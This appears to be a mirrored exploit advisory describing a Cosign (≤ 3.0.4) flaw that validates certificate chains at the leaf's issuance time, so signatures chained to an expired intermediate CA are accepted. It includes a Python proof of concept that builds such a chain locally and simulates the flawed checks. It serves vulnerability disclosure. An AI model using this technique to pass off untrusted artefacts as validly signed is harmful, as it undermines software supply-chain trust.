## https://sploitus.com/exploit?id=PACKETSTORM:216155
=============================================================================================================================================
| # Title : Cosign โค 3.0.4 Temporal Certificate Chain Validation Bypass in Due to Improper Use of Issuance Time |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/sigstore/cosign/releases |
=============================================================================================================================================
[+] Summary : A logical flaw in the certificate verification process of Cosign (โค 3.0.4) allows signatures to be accepted even when the issuing Intermediate Certificate Authority (CA) has already expired.
The vulnerability arises from validating the certificate chain using the leaf certificateโs issuance time (NotBefore) instead of the current system time.
Because of this, the chain is considered valid if it was valid at the moment the leaf certificate was issued, regardless of whether the Intermediate CA is expired at verification time.
The verification process performs two separate checks:
It validates the certificate chain at the leafโs issuance time.
It validates that the leaf certificate itself is currently within its validity period.
If both conditions pass, the signature is accepted โ even though the Intermediate CA is no longer valid.
[+] POC : pip install cryptography
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec
def create_poc():
now = datetime.datetime.utcnow()
root_key = ec.generate_private_key(ec.SECP256R1())
sub_key = ec.generate_private_key(ec.SECP256R1())
leaf_key = ec.generate_private_key(ec.SECP256R1())
root_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Root CA")])
root_cert = (
x509.CertificateBuilder()
.subject_name(root_subject)
.issuer_name(root_subject)
.public_key(root_key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(now - datetime.timedelta(hours=10))
.not_valid_after(now + datetime.timedelta(hours=10))
.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
.sign(root_key, hashes.SHA256())
)
sub_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Expired Intermediate")])
sub_cert = (
x509.CertificateBuilder()
.subject_name(sub_subject)
.issuer_name(root_subject)
.public_key(sub_key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(now - datetime.timedelta(hours=2))
.not_valid_after(now - datetime.timedelta(minutes=10)) # Expired!
.add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
.sign(root_key, hashes.SHA256())
)
leaf_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Valid Leaf")])
leaf_cert = (
x509.CertificateBuilder()
.subject_name(leaf_subject)
.issuer_name(sub_subject)
.public_key(leaf_key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(now - datetime.timedelta(minutes=30))
.not_valid_after(now + datetime.timedelta(minutes=30))
.sign(sub_key, hashes.SHA256())
)
print("--- Simulating Vulnerable Logic (Cosign <= 3.0.4) ---")
issuance_time = leaf_cert.not_valid_before
if sub_cert.not_valid_before <= issuance_time <= sub_cert.not_valid_after:
print(f"[+] Step A: Chain is considered VALID because it was valid at {issuance_time}")
if leaf_cert.not_valid_before <= now <= leaf_cert.not_valid_after:
print(f"[+] Step B: Leaf is considered VALID at current time {now}")
print("\n[!] RESULT: Vulnerable Cosign would accept this signature!")
if __name__ == "__main__":
create_poc()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================